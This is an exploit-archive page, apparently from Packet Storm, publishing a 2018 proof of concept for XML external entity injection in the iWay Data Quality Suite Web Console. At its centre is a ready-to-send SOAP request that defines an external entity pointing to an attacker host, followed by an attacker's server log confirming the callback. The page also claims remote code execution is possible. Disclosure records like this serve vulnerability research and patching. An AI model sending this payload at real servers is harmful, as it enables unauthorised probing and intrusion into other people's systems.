exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iWay Data Quality Suite Web Console 10.6.1.ga XML Injection

iWay Data Quality Suite Web Console 10.6.1.ga XML Injection
Posted Sep 27, 2018
Authored by Sureshbabu Narvaneni

iWay Data Quality Suite Web Console version 10.6.1.ga suffers from an XML external entity injection vulnerability.

tags | exploit, web
SHA-256 | cd2ba04d9848a473c28202f68204338199eb8e5285f94b0ea6d14d308671ad8b

iWay Data Quality Suite Web Console 10.6.1.ga XML Injection

Change Mirror Download
# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 a XML External Entity Injection
# Google Dork: N/A
# Date: 2018-09-27
# Exploit Author: Sureshbabu Narvaneni#
# Author Blog : https://nullnews.in
# Vendor Homepage: www.informationbuilders.co.uk
# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite
# Affected Version: 10.6.1.ga
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : N/A

# Technical Description:
# iWay Data Quality Suite Web Console provides web services features. As there is no
# validation present on the web services featured by product while processing
# the user input an attacker can easily inject external entities in the SOAP request and can
# achieve the successful Remote Code Execution on the server

# Proof Of Concept:

> Access the iWay DQS Web Console application section.
> Create an entry for web service and form a sample SOAP request.
> Send below crafted request to the server to confirm the vulnerability

<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]>
<soapenv:Envelope
xml:soapenv="http://schemas.xmlsoap.org/soap/envelope"
xmlns:ws="http://www.example.com/ws">
<soapenv:Header/>
<soapenv:Body>
<ws:test>
<ws:in>&xxe;</ws:in>
</ws:test>
</soapenv:Body>
</soapenv:Envelope>

> The below log shows that the web service component is vulnerable to XXE.

root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log
1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404
474 "-" "-"

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close